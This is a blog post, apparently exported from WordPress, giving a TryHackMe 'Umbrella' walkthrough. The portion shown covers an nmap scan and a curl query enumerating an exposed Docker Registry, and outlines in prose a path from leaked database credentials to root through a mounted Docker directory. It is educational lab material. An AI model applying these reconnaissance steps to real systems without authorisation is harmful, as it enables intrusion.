{"id":103,"date":"2024-01-24T00:17:21","date_gmt":"2024-01-24T00:17:21","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=103"},"modified":"2024-04-16T20:55:33","modified_gmt":"2024-04-17T01:55:33","slug":"tryhackme-umbrella","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/","title":{"rendered":"TryHackMe: Umbrella"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"800\" data-attachment-id=\"104\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/umbrella\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?fit=800%2C800&amp;ssl=1\" data-orig-size=\"800,800\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"umbrella\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?fit=800%2C800&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=800%2C800&#038;ssl=1\" alt=\"\" class=\"wp-image-104\" style=\"width:189px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?w=800&amp;ssl=1 800w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=300%2C300&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=150%2C150&amp;ssl=1 150w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=768%2C768&amp;ssl=1 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/figure>\n<\/div>\n\n\n<p><a href=\"https:\/\/tryhackme.com\/room\/umbrella\" target=\"_blank\" rel=\"noopener noreferrer nofollow\" title=\"Umbrella \">Umbrella <\/a>from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and connect to SSH. To get root access we will abuse a mounted directory in a Docker container which is also accessible by a low-privileged user.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">NMAP<\/mark><\/h2>\n\n\n\n<p>We will begin with NMAP to find the open ports on the machine. Our NMAP scan shows the following ports are open:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>22 <strong>SSH<\/strong><\/li>\n\n\n\n<li>3306 <strong>MySQL<\/strong><\/li>\n\n\n\n<li>5000 <strong>Docker Registry<\/strong><\/li>\n\n\n\n<li>8080 <strong>HTTP<\/strong><\/li>\n<\/ul>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Umbrella]\n\u2514\u2500$ nmap -p22,3306,5000,8080 10.10.166.146 -A -oN nmap\/umbrella-full\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-01-20 14:49 CST\nNmap scan report for 10.10.166.146\nHost is up (0.20s latency).\n\nPORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 f0:14:2f:d6:f6:76:8c:58:9a:8e:84:6a:b1:fb:b9:9f (RSA)\n|   256 8a:52:f1:d6:ea:6d:18:b2:6f:26:ca:89:87:c9:49:6d (ECDSA)\n|_  256 4b:0d:62:2a:79:5c:a0:7b:c4:f4:6c:76:3c:22:7f:f9 (ED25519)\n3306\/tcp open  mysql   MySQL 5.7.40\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.7.40\n|   Thread ID: 7\n|   Capabilities flags: 65535\n|   Some Capabilities: SupportsCompression, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, FoundRows, DontAllowDatabaseTableColumn, IgnoreSigpipes, SwitchToSSLAfterHandshake, InteractiveClient, LongColumnFlag, Speaks41ProtocolNew, LongPassword, ConnectWithDatabase, Speaks41ProtocolOld, SupportsTransactions, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins\n|   Status: Autocommit\n|   Salt: \\x02Ev}J1\\x1E}#\\x02!M\\x0FC\\EA1tb\n|_  Auth Plugin Name: mysql_native_password\n| ssl-cert: Subject: commonName=MySQL_Server_5.7.40_Auto_Generated_Server_Certificate\n| Not valid before: 2022-12-22T10:04:49\n|_Not valid after:  2032-12-19T10:04:49\n|_ssl-date: TLS randomness does not represent time\n5000\/tcp open  http    Docker Registry (API: 2.0)\n|_http-title: Site doesn't have a title.\n8080\/tcp open  http    Node.js (Express middleware)\n|_http-title: Login\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/Umbrella<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p22,3306,5000,8080<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.166.146<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-oN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap\/umbrella-full<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.94<\/span><span style=\"color: #C3E88D\">SVN<\/span><span style=\"color: #BABED8\"> ( <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org<\/span><span style=\"color: #BABED8\"> ) at 2024-01-20 14:49 CST<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.166.146<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> (0.20s <\/span><span style=\"color: #C3E88D\">latency<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8.2<\/span><span style=\"color: #C3E88D\">p1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Ubuntu<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">ubuntu0.5<\/span><span style=\"color: #BABED8\"> (Ubuntu <\/span><span style=\"color: #C3E88D\">Linux<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">protocol<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">3072<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">f0:14:2f:d6:f6:76:8c:58:9a:8e:84:6a:b1:fb:b9:9f<\/span><span style=\"color: #BABED8\"> (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8<\/span><span style=\"color: #C3E88D\">a:52:f1:d6:ea:6d:18:b2:6f:26:ca:89:87:c9:49:6d<\/span><span style=\"color: #BABED8\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">b:0d:62:2a:79:5c:a0:7b:c4:f4:6c:76:3c:22:7f:f9<\/span><span style=\"color: #BABED8\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3306\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">mysql<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">MySQL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5.7<\/span><span style=\"color: #C3E88D\">.40<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">mysql-info:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Protocol:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5.7<\/span><span style=\"color: #C3E88D\">.40<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Thread<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ID:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Capabilities<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">flags:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">65535<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Some<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Capabilities:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsCompression,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Support41Auth,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IgnoreSpaceBeforeParenthesis,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsLoadDataLocal,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FoundRows,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DontAllowDatabaseTableColumn,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IgnoreSigpipes,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SwitchToSSLAfterHandshake,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">InteractiveClient,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LongColumnFlag,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Speaks41ProtocolNew,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LongPassword,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ConnectWithDatabase,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Speaks41ProtocolOld,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsTransactions,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ODBCClient,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsMultipleResults,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsMultipleStatments,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsAuthPlugins<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Status:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Autocommit<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Salt:<\/span><span style=\"color: #BABED8\"> \\x<\/span><span style=\"color: #C3E88D\">02Ev}J1<\/span><span style=\"color: #BABED8\">\\x<\/span><span style=\"color: #C3E88D\">1E}#<\/span><span style=\"color: #BABED8\">\\x<\/span><span style=\"color: #C3E88D\">02!M<\/span><span style=\"color: #BABED8\">\\x<\/span><span style=\"color: #C3E88D\">0FC<\/span><span style=\"color: #BABED8\">\\E<\/span><span style=\"color: #C3E88D\">A1tb<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Auth<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Plugin<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mysql_native_password<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssl-cert:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Subject:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">commonName=MySQL_Server_5.7.40_Auto_Generated_Server_Certificate<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">before:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2022<\/span><span style=\"color: #C3E88D\">-12-22T10:04:49<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">after:<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2032<\/span><span style=\"color: #C3E88D\">-12-19T10:04:49<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_ssl-date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TLS<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">randomness<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">does<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">represent<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">time<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">5000\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">Docker<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Registry<\/span><span style=\"color: #BABED8\"> (API: <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Site<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">doesn<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">t have a title.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">8080\/tcp open  http    Node.js (Express middleware)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">|_http-title: Login<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">Service Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:31px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We do not have credentials for SSH, MySQL, or the web login on Port 8080. We will begin with enumerating port 5000 which is a default port for Docker Registry.<\/p>\n\n\n\n<p><a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/5000-pentesting-docker-registry\" target=\"_blank\" rel=\"noreferrer noopener\">Hacktricks <\/a>has a blog for pentesting Docker Registry and it helped to get a foothold on the machine.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Enumeration<\/mark><\/h2>\n\n\n\n<p>Docker registry may be configured to use <strong>HTTP<\/strong> or <strong>HTTPS<\/strong>. So the first thing you may need to do is <strong>find which one<\/strong> is being configured:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"curl -s http:\/\/10.10.10.10:5000\/v2\/_catalog\n#If HTTPS\nWarning: Binary output can mess up your terminal. Use &quot;--output -&quot; to tell \nWarning: curl to output it to your terminal anyway, or consider &quot;--output \nWarning: &lt;FILE&gt;&quot; to save to a file.\n\n#If HTTP\n{&quot;repositories&quot;:[&quot;alpine&quot;,&quot;ubuntu&quot;]}\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.10.10.10:5000\/v2\/_catalog<\/span><\/span>\n<span class=\"line\"><span style=\"color: #676E95; font-style: italic\">#If HTTPS<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Warning:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Binary<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">output<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">can<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mess<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">your<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">terminal.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Use<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">--output -<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tell<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Warning:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">output<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">it<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">your<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">terminal<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">anyway,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">consider<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">--output <\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">Warning: &lt;FILE&gt;<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">save<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">a<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">file.<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #676E95; font-style: italic\">#If HTTP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><span style=\"color: #FFCB6B\">&quot;repositories&quot;<\/span><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #BABED8\">[<\/span><span style=\"color: #FFCB6B\">&quot;alpine&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;ubuntu&quot;<\/span><span style=\"color: #FFCB6B\">]}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:43px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>In this case, we did not get any errors which confirms that it is running <strong>HTTP <\/strong>and not<strong> HTTPS<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"78\" data-attachment-id=\"109\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/2-image\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?fit=1396%2C106&amp;ssl=1\" data-orig-size=\"1396,106\" data-comments-opened=\"1\" 